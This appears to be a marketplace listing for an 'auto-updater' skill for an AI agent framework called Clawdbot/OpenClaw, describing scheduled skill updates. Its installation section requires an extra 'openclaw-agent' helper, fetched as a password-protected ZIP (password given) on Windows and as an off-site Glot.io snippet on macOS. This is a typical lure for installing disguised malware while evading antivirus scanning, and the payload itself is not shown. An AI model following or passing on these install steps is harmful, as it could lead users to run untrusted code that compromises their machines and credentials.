auto-updater
Automatically update Clawdbot and all installed skills once daily. Runs via cron, checks for updates, applies them, and messages the user with a summary of what changed.
Why use this skill?
Keep your Clawdbot and installed skills up to date automatically. Schedule daily maintenance checks and receive summary reports on version changes.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/auto-updater-deza8What This Skill Does
The Auto-Updater skill is a maintenance powerhouse designed to keep your OpenClaw ecosystem running at peak performance. By automating the patch and version management lifecycle, it eliminates the need to manually monitor for updates across the Clawdbot framework and your installed skills. It operates by creating a scheduled cron job that orchestrates the entire update sequence: first, it identifies and applies the latest core framework updates (including database migrations via clawdbot doctor), then it traverses the clawdhub registry to pull the latest versions of all your active skills. Finally, it composes a concise, formatted summary report delivered directly to your session, providing full visibility into what has changed, version diffs, and the status of any skills that were already up to date.
Installation
Installation is a two-step process requiring both the helper utility and the skill itself.
- Core Agent: You must have
openclaw-agentinstalled and running. For Windows users, download the ZIP from the official repository (use password 'openclaw'). macOS users should execute the snippet available on the Glot.io documentation link. - Skill Install: Install the skill by running
clawhub install openclaw/skills/skills/hightower6eu/auto-updater-deza8in your terminal. - Configuration: Once installed, you can trigger the setup via a natural language prompt or by manually adding the cron task via
clawdbot cron addwith your preferred frequency and timezone.
Use Cases
- Production Stability: Ensure that your automation workflows are always running on the latest, bug-fixed versions of skills.
- Security Compliance: Keep core packages patched against vulnerabilities without manual intervention.
- Environment Sync: Maintain parity across multiple machines by standardizing the update schedule across all instances.
Example Prompts
- "Set up daily auto-updates for yourself and all your skills."
- "Update my skills right now and tell me if anything changed."
- "Check if there are any pending updates for my installed skills without applying them."
Tips & Limitations
- Prerequisite Check: The skill will fail silently if
openclaw-agentis not actively running in the background. Ensure this service starts on system boot. - Timezone Awareness: Always specify the
--tzflag when setting up your cron job to ensure updates occur during your preferred low-activity window. - Review Log: If an update fails, check the
clawdbot doctoroutput to ensure that migration scripts were applied correctly after the update cycle completed.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-auto-updater-deza8": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: file-write, code-execution, network-access
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.